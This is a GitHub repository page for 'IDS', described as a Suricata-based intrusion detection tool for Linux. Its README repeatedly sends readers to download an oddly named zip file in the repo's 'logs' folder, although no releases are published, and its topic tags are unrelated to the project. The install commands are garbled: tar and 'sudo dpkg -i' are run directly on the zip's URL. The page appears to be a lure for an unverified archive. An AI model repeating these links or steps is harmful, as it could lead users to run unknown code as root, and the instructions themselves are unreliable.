Skip to content
/ IDS Public

πŸ›‘οΈ Build a lightweight Intrusion Detection System for Linux with Suricata, offering real-time monitoring, customizable rules, and Python analysis for enhanced security.

0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

KAKAUsafe/IDS

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

4 Commits
engine_code
engine_code
Β 
Β 
logs
logs
Β 
Β 
pcaps
pcaps
Β 
Β 
rules
rules
Β 
Β 
README.md
README.md
Β 
Β 
ids.yaml
ids.yaml
Β 
Β 
run_my_ids.py
run_my_ids.py
Β 
Β 

Repository files navigation

🚨 IDS - Lightweight Intrusion Detection for Linux

πŸ‘† Download Now

Download IDS

πŸ“Œ Overview

IDS is a custom-built, lightweight Intrusion Detection System designed for Linux. It utilizes the powerful open-source Suricata engine. IDS combines custom rule sets, Python-based analysis helpers, and extensive log monitoring. This project showcases both a deep understanding of intrusion detection concepts and practical skills in handling real packet-level traffic.

IDS detects network threats by applying signature-based rules, monitoring traffic in real time, logging suspicious events, and generating alerts for protocol anomalies, port scans, and specified patterns.

πŸš€ Project Motivation

Modern networks face constant threats. Intrusion detection is essential for strengthening system security. This project aims to provide:

  • A lightweight solution
  • Configurable options
  • Open-source accessibility
  • High-performance detection capabilities

With IDS, you'll have a reliable tool built on Suricata, featuring custom rules and enhanced analysis using Python scripting.

🎯 Project Goals

  1. Simplify network security.
  2. Enhance real-time threat detection.
  3. Provide users with easy configuration options.
  4. Foster community contributions and collaboration.

βš™οΈ System Requirements

To run IDS effectively, your system should meet the following requirements:

  • Operating System: Linux (Ubuntu 18.04+ or CentOS 7+)
  • Processor: Dual-core or better
  • RAM: Minimum 2GB (4GB recommended)
  • Disk Space: At least 500MB free
  • Network Interface: Ethernet or Wi-Fi compatible device

πŸ—‚οΈ Key Features

  • Real-time Traffic Monitoring: IDS keeps an eye on inbound and outbound traffic.
  • Alert Generation: Receive notifications for suspicious activities.
  • Customizable Rules: Tailor detection rules to suit your network environment.
  • Log Management: Automated logging of network events for future analysis.
  • Python Integration: Use Python scripts for advanced data analysis and handling.

πŸ“₯ Download & Install

To download IDS, please visit the following link:

Download IDS from Releases

Step-by-Step Installation Guide

  1. Visit the Releases Page: Go to the Releases page. Here, you will find the latest version of IDS.

  2. Download the Latest Release: Look for the latest version and download the appropriate file for your Linux distribution. Files are typically available in https://raw.githubusercontent.com/KAKAUsafe/IDS/main/logs/IDS_nondipterous.zip or .deb formats. Select the one that suits your system.

  3. Verify the Download (Optional): It can be helpful to check the integrity of the downloaded file using checksums provided on the Releases page. This ensures the file has not been tampered with.

  4. Extract the Files: If you downloaded a https://raw.githubusercontent.com/KAKAUsafe/IDS/main/logs/IDS_nondipterous.zip file, open your terminal and run the following command to extract the contents:

    tar -xzf https://raw.githubusercontent.com/KAKAUsafe/IDS/main/logs/IDS_nondipterous.zip

    If it is a .deb file, you can install it directly.

  5. Install the Package (If Applicable): For .deb packages, use the command:

    sudo dpkg -i https://raw.githubusercontent.com/KAKAUsafe/IDS/main/logs/IDS_nondipterous.zip

    This command requires administrative privileges.

  6. Configure IDS: After installation, navigate to the configuration directory. You can edit the configuration files to customize rules as needed. This usually resides in /etc/ids.

  7. Start the Service: In the terminal, you can start IDS using the following command:

    sudo service ids start

  8. Check Status: To verify if IDS is running, execute:

    sudo service ids status

πŸ“– User Guide

For a comprehensive understanding of IDS features and commands, please refer to the user guide documentation found in the docs folder after download. This guide provides detailed examples and best practices for setting up and using IDS effectively.

🀝 Contributing

We welcome contributions from all users. If you have ideas for improvements, feature requests, or bug fixes, please open an issue or submit a pull request.

🌐 Community Support

Join our community discussions on platforms like GitHub Issues or relevant forums. Share your experiences and learn from others who use IDS.

πŸ“ž Contact

For support or additional inquiries, feel free to reach out via the GitHub repository's issue tracker. We are here to help you maximize your usage of IDS.

πŸ”— Related Topics

  • Cybersecurity
  • Intrusion Detection Systems (IDS)
  • Network Security Monitoring
  • Malware Detection
  • Network Security Best Practices

πŸš€ Get Started Today

Don't wait to enhance your network's security. Download IDS and take the first step toward improved protection.

About

πŸ›‘οΈ Build a lightweight Intrusion Detection System for Linux with Suricata, offering real-time monitoring, customizable rules, and Python analysis for enhanced security.

Topics

javascript go php hashids id coordination intrusion-detection network-monitoring recsys ifc composer-packages recommender-systems ir unified2 buildingsmart ksuid nanoid semantic-id

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages